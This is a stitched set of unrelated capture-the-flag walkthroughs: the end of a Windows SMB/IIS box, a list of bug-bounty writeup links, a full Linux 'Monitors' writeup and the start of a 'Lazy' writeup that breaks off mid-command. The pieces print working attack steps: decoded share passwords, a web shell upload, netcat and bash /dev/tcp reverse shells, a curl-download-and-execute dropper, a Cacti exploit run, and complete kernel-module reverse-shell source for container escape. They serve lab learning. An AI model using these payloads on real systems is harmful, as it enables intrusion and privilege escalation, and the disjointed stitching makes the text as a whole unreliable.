445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds
```
A scan of all TCP and UDP ports identified 49663 open as well.
```bash
sudo nmap 10.10.22.113 -sS -sU -p- --min-rate 1000 -oA relevant-open-ports-all
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:24 MDT
Nmap scan report for 10.10.225.154
Host is up (0.22s latency).
Not shown: 65535 open|filtered ports, 65529 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 263.49 seconds
```
I used Netcat to verify Nmap's results.
```bash
nc -nzv 10.10.71.98 80
(UNKNOWN) [10.10.71.98] 80 (http) open
nc -nzv 10.10.71.98 135
(UNKNOWN) [10.10.71.98] 135 (epmap) open
nc -nzv 10.10.71.98 139
(UNKNOWN) [10.10.71.98] 139 (netbios-ssn) open
nc -nzv 10.10.71.98 445
(UNKNOWN) [10.10.71.98] 445 (microsoft-ds) open
nc -nzv 10.10.71.98 3389
(UNKNOWN) [10.10.71.98] 3389 (ms-wbt-server) open
nc -nzv 10.10.71.98 49663
(UNKNOWN) [10.10.71.98] 49663 (?) open
```
### Services
Nmap determined the target is running the following service versions:
* Microsoft IIS httpd 10.0
* Microsoft Windows RPC
* Microsoft Windows netbios-ssn
* Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
* Microsoft Terminal Services
* Microsoft IIS httpd 10.0
```bash
sudo nmap 10.10.225.154 -sS -p T:80,135,139,445,3389,49663 -sV -oA relevant-serviceversions
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:34 MDT
Nmap scan report for 10.10.225.154
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
49663/tcp open http Microsoft IIS httpd 10.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.17 seconds
```
### Operating System
```bash
sudo nmap 10.10.39.215 -O -oA relevant-os
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 07:19 MDT
Nmap scan report for 10.10.39.215
Host is up (0.21s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds
```
### Web Browsing
Browsing to TCP port 80 produced a Windows IIS server landing page.
```bash
firefox http://10.10.225.154
```
### Web Crawling
Dirsearch was unable to identify anything of value aside from getting a few HTTP 403 response codes.
```bash
python3 dirsearch/dirsearch.py -u 10.10.225.154 --simple-report relevant-tcp80-webcrawl.txt
# output
[05:57:36] 403 - 312B - /%2e%2e//google.com
[05:57:54] 403 - 2KB - /Trace.axd
[05:57:56] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
```
Dirsearch discovered directory of interest on TCP port 49663.
```bash
python3 dirsearch/dirsearch.py -u 10.10.225.154:49663 --simple-report relevant-tcp49663-webcrawl.txt
# output
403 312B http://10.10.225.154:49663/%2e%2e//google.com
403 2KB http://10.10.225.154:49663/Trace.axd
403 312B http://10.10.225.154:49663/\..\..\..\..\..\..\..\..\..\etc\passwd
301 164B http://10.10.225.154:49663/aspnet_client -> REDIRECTS TO: http://10.10.225.154:49663/aspnet_client/
200 0B http://10.10.225.154:49663/aspnet_client/
```
### SMB Browsing
Discovered four shares.
```bash
smbclient -L //10.10.225.154
# output
Enter WORKGROUP\victor's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
```
Discovered an interesting file one a share called "nt4wrksv."
```bash
smbclient //10.10.225.154/nt4wrksv
dir
# output
. D 0 Sat Jul 25 15:46:04 2020
.. D 0 Sat Jul 25 15:46:04 2020
passwords.txt A 98 Sat Jul 25 09:15:33 2020
7735807 blocks of size 4096. 5136985 blocks available
```
Viewed file from interesting share, provided encoded passwords.
```bash
smbclient //10.10.225.154/nt4wrksv
more passwords.txt
# more
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```
Decoded the strings from the "passwords.txt" file.
```bash
echo 'Qm9iIC0gIVBAJCRXMHJEITEyMw==' | base64 --decode
Bob - !P@$$W0rD!123 # output
echo 'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' | base64 --decode
Bill - Juw4nnaM4n420696969!$$$ # output
```
Smbmap (Bob)
```bash
smbmap -u bob -p '!P@$$W0rD!123' -H 10.10.71.98
# output
[+] IP: 10.10.71.98:445 Name: 10.10.71.98
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
nt4wrksv READ, WRITE
```
### Vulnerability Scanning
HTTP
```bash
nikto -h 10.10.71.98 -Format txt -o relevant-nikto.txt
# output
- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.71.98
+ Target Port: 80
+ GET Retrieved x-powered-by header: ASP.NET
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-aspnet-version header: 4.0.30319
+ OPTIONS Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OPTIONS Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.219.77
+ Target Port: 49663
+ GET Retrieved x-powered-by header: ASP.NET
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-aspnet-version header: 4.0.30319
+ OPTIONS Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OPTIONS Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
```
SMB
```bash
sudo nmap 10.10.225.154 --script smb-enum-* -p445 -oA relevant-smb-enumeration
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:59 MDT
Nmap scan report for 10.10.225.154
Host is up (0.21s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-sessions:
|_ <nobody>
| smb-enum-shares:
| account_used: guest
| \\10.10.225.154\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.225.154\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.225.154\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.10.225.154\nt4wrksv:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
Nmap done: 1 IP address (1 host up) scanned in 70.54 seconds
```
## Exploit
Uploading a web shell to the "nt4wrksv" share.
```bash
# on the attacker side
mkdir /mnt/relevant
sudo mount //10.10.59.193/nt4wrksv /mnt/relevant -o username=bob
cp /usr/share/webshells/aspx/cmdasp.aspx /mnt/relevant
```
Using the web shell to invoke a reverse shell.
```
# on the attacker side
cp /usr/share/windows-binaries/nc.exe /mnt/relevant
firefox http://10.10.88.43:49663/nt4wrksv/cmdasp.aspx
sudo nc -nvlp 443
# within the web shell (at the URL above)
dir
powershell.exe -c "C:\inetpub\wwwroot\nt4wrksv\nc.exe -e cmd.exe 443 10.2.76.52"
```
## Explore
```bash
# on the victim side, via the reverse shell
more C:\Users\Bob\Desktop\user.txt # first flag
```
## Escalate
Identify privileges of the current user.
```
# on the victim side, via the reverse shell
whoami /priv
# output
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
Abusing the SeImpersonatePrivilege.
```
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
sudo cp PrintSpoofer64.exe /mnt/relevant
.\PrintSpoofer64.exe -i -c powershell.exe
more C:\Users\Administrator\Desktop\root.txt # second flag
```
|
# WebVulnerabilityWriteUps
This repository contains well-written bugbounty writeups.
* [Cross Site Scripting](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/cross_site_scripting.md)
* [Cross Site Request Forgery](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/cross_site_request_forgery.md)
* [SQL Injection](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/sql_injection.md)
* [Insecure Direct Object Reference](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/insecure_direct_object_reference.md)
* [Serverside Template Injection](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/serverside_template_injection.md)
* [XML External Entity](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/xml_external_entity.md)
* [Mobile Security](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/mobile_security.md)
* [Flash Files](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/flash_files.md)
* [Parameter Pollution](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/parameter_pollution.md)
* [Remote Code Execution](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/remote_code_execution.md)
* [OAuth](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/OAuth.md)
* [Server-side Request Forgery](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/serverside_request_forgery.md)
* [Privilege Escalation](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/privilege_escalation.md)
* [CORS](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/cross_origin_resource_sharing.md)
* [Host Header Injection](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/host_header_injection.md)
* [Local File Inclusion](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/local_file_inclusion.md)
* [Out of Categories](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/out_of_categories.md)
* [Tweets](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/tweets.md)
* [BugBountyForum AMA](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/BugBountyForum-Ama.md)
* [RECON](https://github.com/csmali/WebVulnerabilityWriteUps/blob/master/topics/recon.md)
|
# Monitors - HackTheBox - Writeup
Linux, 40 Base Points, Hard
## Machine
![Monitors.JPG](images/Monitors.JPG)
### TL;DR;
To solve this machine, we begin by enumerating open services – finding only ports ```22``` and ```80```.
***User:*** Finding WordPress plugin using ```wpscan``` with ```LFI``` vulnerability, get credentials from ```wp-config.php``` using LFI, Find another vhost ```cacti-admin.monitors.htb```, with Cacti system, get a reverse shell, Find ```/home/marcus/.backup/backup.sh``` file with user ```marcus``` credentials and get the user flag.
***Root:*** Find ```notes.txt``` in ```/home/marcus``` directory, Find running container with vulnerability (CVE-2020-9496), Use ```sys-module-capability``` to container escape by loading kernel module and get the root flag.
## Monitors Solution
### User
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Monitors]
└──╼ $ nmap -sC -sV -oA nmap/Monitors 10.10.10.238
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-26 14:44 IDT
Nmap scan report for 10.10.10.238
Host is up (0.079s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
| 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_ 256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.85 second
```
Let's observe port 80 [http://10.10.10.238/](http://10.10.10.238/):
![port80.JPG](images/port80.JPG)
We can see domain and also user name ```admin```, ```monitors.htb```.
Direct acces by IP Is not allowed, So by adding ```monitors.htb``` domain to ```/etc/hosts``` we can browse to [http://monitors.htb](http://monitors.htb):
![port80domain.JPG](images/port80domain.JPG)
By running ```gobuster``` we found WordPress page [http://monitors.htb/wp-login.php](http://monitors.htb/wp-login.php):
![wplogin.JPG](images/wplogin.JPG)
Let's run [wpscan](https://github.com/wpscanteam/wpscan) (You can get you ```WPSCAN_KEY``` from [https://wpscan.com/profile](https://wpscan.com/profile)):
```console
┌─[evyatar@parrot]─[/hackthebox/Monitors]
└──╼ $ wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -t 50
...
+] wp-with-spritz
| Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
| Readme: http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
| [!] Directory listing is enabled
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://monitors.htb/wp-content/plugins/wp-with-spritz/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP with Spritz 1.0 - Unauthenticated File Inclusion
| References:
| - https://wpvulndb.com/vulnerabilities/cdd8b32a-b424-4548-a801-bbacbaad23f8
| - https://www.exploit-db.com/exploits/44544/
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
...
```
We got an unauthenticated file inclusion vulnerability in the ```wp spritz plugin```.
Following [https://www.exploit-db.com/exploits/44544](https://www.exploit-db.com/exploits/44544) we can make the following HTTP request to get LFI [http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd](http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd):
![passwd.JPG](images/passwd.JPG)
By browsing to [http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php](http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php) we can get ```wp-config.php``` file which contains the following credentials:
```php
<?php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
...
```
By trying the following [https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/rfi-lfi/lfi-linux-list.txt](https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/rfi-lfi/lfi-linux-list.txt) list using BurpSuite intruder, we found the following config file:
![000-default.JPG](images/000-default.JPG)
As we can see, At the top of the file we can see:
```
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
```
Let's add the second virtual host to ```/etc/hosts``` and browse to [http://cacti-admin.monitors.htb](http://cacti-admin.monitors.htb):
![cacti.JPG](images/cacti.JPG)
By using the credentials ```admin:BestAdministrator@2020!``` (password from ```wp-config.php``` file) we get:
![console.JPG](images/console.JPG)
By clicking on [About](http://cacti-admin.monitors.htb/cacti/about.php) page:
![about.JPG](images/about.JPG)
We found this is Cacti 1.2.12, This version contains few vulnerabilities, Let's use this one [https://www.exploit-db.com/exploits/49810](https://www.exploit-db.com/exploits/49810).
By running the script from the link above we pop a shell:
```console
┌─[evyatar@parrot]─[/hackthebox/Monitors]
└──╼ $ python3 exp.py -t http://cacti-admin.monitors.htb -u admin -p BestAdministrator@2020! --lhost 10.10.14.14 --lport 1338
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:ef977117a35b52bc2b3bae3df55128c459b8514c,1627333100
[+] Trying to log in...
[+] Successfully logged in!
[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"
[+] Check your nc listener!
```
```console
┌─[evyatar@parrot]─[/hackthebox/Monitors]
└──╼ $ nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.14] from monitors.htb [10.10.10.238] 42842
/bin/sh: 0: can't access tty; job control turned off
$
```
We can see on ```/home``` directory another directory related to ```marcus``` user.
By running the following command ```grep 'marcus' /etc -R 2>/dev/null``` on ```/etc``` we get the follow:
```console
$ grep 'marcus' /etc -R 2>/dev/null
/etc/group-:marcus:x:1000:
/etc/subgid:marcus:165536:65536
/etc/group:marcus:x:1000:
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:marcus:165536:65536
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
```
By observing the file ```/home/marcus/.backup/backup.sh``` we can see:
```bash
$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="VerticalEdge2020"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
```
We can use ```VerticalEdge2020``` password to ssh login with user ```marcus```:
```console
┌─[evyatar@parrot]─[/hackthebox/Monitors]
└──╼ $ ssh marcus@monitors.htb
marcus@monitors.htb's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Jul 26 21:49:36 UTC 2021
System load: 0.0 Users logged in: 0
Usage of /: 32.9% of 17.59GB IP address for ens160: 10.10.10.238
Memory usage: 38% IP address for br-968a1c1855aa: 172.18.0.1
Swap usage: 0% IP address for docker0: 172.17.0.1
Processes: 184
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
99 packages can be updated.
70 of these updates are security updates.
To see these additional updates run: apt list --upgradable
marcus@monitors:~$ cat user.txt
7469bb246567743c7733b7d3a8fe3b1f
```
And we get the user flag ```7469bb246567743c7733b7d3a8fe3b1f```.
### Root
```/home/marcus``` directory contains ```note.txt``` file with the following content:
```
marcus@monitors:~$ cat note.txt
TODO:
Disable phpinfo in php.ini - DONE
Update docker image for production use -
```
If we are running ```ps -ef | grep docker``` we get:
```console
marcus@monitors:~$ ps -ef | grep docker
...
root 2046 1574 0 20:18 ? 00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
...
```
The purpose of [docker-proxy](https://windsock.io/the-docker-proxy/) command is to enable a service consumer to communicate with the service providing container, The docker-proxy operates in userland, and simply receives any packets arriving at the host's specified port, and redirects them to the container's port.
So the request to ```127.0.0.1:8443``` leading to the container in the same port.
If we want to access this local port we need to create an SSH tunnel as follow:
```console
┌─[evyatar@parrot]─[/hackthebox/Monitors]
└──╼ $ ssh -N -L 8443:127.0.0.1:8443 -R 8443:127.0.0.1:8443 marcus@monitors.htb
marcus@monitors.htb's password:
```
And now, By browsing to [http://localhost:8443](http://localhost:8443) we get:
![port8443.JPG](images/port8443.JPG)
Nothing is interesting, But let's pay attention to the Apache version which is ```Apache Tomcat/9.0.31```.
The version has an exploit related to deserialization - [CVE-2020-9496](https://nvd.nist.gov/vuln/detail/CVE-2020-9496), [https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/](https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation//).
Let's exploit metasploit:
```console
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set ForceExploit true
ForceExploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set LHOST 10.10.14.14
LHOST => 10.10.14.14
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/0tofJMLO0SfZf
[*] Local IP: http://10.0.2.15:8080/0tofJMLO0SfZf
[+] Successfully executed command: curl -so /tmp/AJDUKNgC http://10.10.14.14:8080/0tofJMLO0SfZf;chmod +x /tmp/AJDUKNgC;/tmp/AJDUKNgC;rm -f /tmp/AJDUKNgC
[*] Client 10.10.10.238 (curl/7.64.0) requested /0tofJMLO0SfZf
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Sending stage (36 bytes) to 10.10.10.238
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Command shell session 1 opened (10.10.14.14:4444 -> 10.10.10.238:33386) at 2021-07-29 00:00:33 +0300
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
```
So we get a root shell to the container, We need to escape from container to host.
Let's use the following article [https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd](https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd) to do that.
***Step 1***: Check the capabilities provided to the docker container.
First let's run the following command ```capsh --print```:
```console
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=
```
The container has SYS_MODULE capability. As a result, the container can insert/remove kernel modules in/from the kernel of the Docker host machine.
***Step 2***: Write a program to invoke a reverse shell with the help of usermode Helper API
```reverse-shell.c```:
```C
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.1/4445 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
```
I changed the IP and the port so that I would listen on the host.
Copy this file to container from your host using ```curl``` to ```/```:
```console
curl http://10.10.14.14:8000/reverse-shell.c > reverse-shell.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 616 100 616 0 0 2961 0 --:--:-- --:--:-- --:--:-- 2961
ls
reverse-shell.c
```
***Step 3***: Create a Makefile to compile the kernel module.
Copy ```Makefile``` from your host (using ```curl``` - same as before)
```console
cat Makefile
obj-m +=reverse-shell.o
all:
make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
clean:
make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean
```
***Step 4***: Make the kernel module by running ```make```
```console
make
make -C /lib/modules/4.15.0-142-generic/build M=/ modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
CC [M] //reverse-shell.o
Building modules, stage 2.
MODPOST 1 modules
CC /reverse-shell.mod.o
LD [M] /reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
```
It didn’t work - Add the gcc library to the path, And change ``` Makefile to:
```c
obj-m +=reverse-shell.o
all:
make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
clean:
make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean
```
And run:
```console
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make
```
It was succeeded and you will see some new files on the directory:
```console
reverse-shell.c
reverse-shell.ko
reverse-shell.mod.c
reverse-shell.mod.o
reverse-shell.o
```
***Step 5***: Create netcal listener on ```marcus``` shell.
```console
marcus@monitors:~$ nc -nlvp 4445
Listening on [0.0.0.0] (family 0, port 4445)
```
***Step 6***: Insert the kernel module using ```insmod```.
```console
insmod reverse-shell.ko
```
***Step 7***: Get the root flag.
After ```insmod``` commmand you should see new shell on ```marcus``` shell:
```console
Connection from 10.10.10.238 46054 received!
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# cat /root/root.txt
cat /root/root.txt
4227a2dab1102b16cfa4bf52e6a435b2
root@monitors:/#
```
And we get the root flag ```4227a2dab1102b16cfa4bf52e6a435b2```.
|
# Lazy
#### 10.10.10.18
###### Solved by: Dotaplayer365 and revdev
```{r, engine='bash', count_lines}
nmap -sS -sV 10.10.10.18
Nmap scan report for 10.10.10.18
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
```
Website directs us to devcompany's page
![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Lazy/images/Website.PNG "Website")
**To start, you will need to create a user register and then log in to check this company's projects and potential.**
Tried some basic SQL Injections on the login page but nada.
So, lets create a testuser
![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Lazy/images/testuserlogin.PNG "testuserlogin")
After creating a user, there is something peculiar
Once the user is registered, it automatically logs us in as that user.
Lets try and create a user with the name admin
![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Lazy/images/adminalreadyexists.PNG "adminalreadyexists")
So admin already exists...
Maybe if we can trick the login form into thinking we have created the admin user, it should automatically log us into admin
Lets try and play with the username input field
So the user we create will be
```
admin =
```
![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Lazy/images/loginwithadmin.PNG "loginwithadmin")
And we are IN!!
![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Lazy/images/adminpage.PNG "adminpage")
There is a ssh key which we can download
![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Lazy/images/sshkey.PNG "sshkey")
Something important to note in the key page is the highlighted field. Thats the user the key is for
So we save the key in a file called mistos.key
Change its permissions to 600
```
root@kali:~/Hackthebox/Machines/Lazy# wget http://10.10.10.18/mysshkeywithnamemitsos
